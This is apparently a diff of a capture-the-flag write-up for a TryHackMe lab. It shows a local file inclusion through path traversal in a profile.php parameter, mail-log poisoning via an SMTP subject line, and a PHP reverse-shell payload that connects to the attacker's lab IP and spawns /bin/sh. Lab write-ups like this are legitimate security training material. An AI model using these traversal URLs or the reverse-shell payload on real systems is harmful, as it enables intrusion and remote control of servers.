garthheff/CTF-Writeups/TryHackMe/Include.md

 221 2.7.0 Error: I can break rules, too.
 Goodbye.
 ```

+Checking the mail.log and we can see the files from the directory listed,
 http://10.10.85.15:50000/profile.php?img=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/mail.log

 ```
 550 5.1.1 : Recipient address rejected: User unknown in local recipient table; from= to= proto=ESMTP helo= Mar 10 06:17:21 mail postfix/smtpd[2101]: warning: non-SMTP command from ip-10-10-249-90.eu-west-1.compute.internal[10.10.249.90]: Subject: . .. .htaccess 505eb0fb8a9f32853b4d955e1f9123ea.txt api.php auth.php dashboard.php index.php login.php logout.php profile.php templates uploadsMar 10 06:17:21 mail postfix/smtpd[2101]: disconnect from ip-10-10-249-90.eu-west-1.compute.internal[10.10.249.90] ehlo=2 mail=2 rcpt=1/3 data=1/2 unknown=0/1 commands=6/10
 ```

+So now we can LFI the flag without even connecting via SSH
 http://10.10.85.15:50000/profile.php?img=....//....//....//....//....//....//....//....//....//var/www/html/505eb0fb8a9f32853b4d955e1f9123ea.txt

 ```
 THM{#######################}
 ```

-From testing, it's the subject line that gets injected, can we get a reverse shell ?  yes and no, can get connections but they drop straight away.
+Further testing, it's the subject line that gets injected into the log, can we get a reverse shell ?  yes and no, can get connections but they drop straight away.
 Attempted to use msfconsole and listeners such as exploit/multi/handler  PAYLOAD php/meterpreter/reverse_tcp but unfortunately didn't work.
 Might revisit another time

 ```
 Subject: <?php $sock=fsockopen("10.10.249.90",8997);system("/bin/sh -i <&3 >&3 2>&3");?>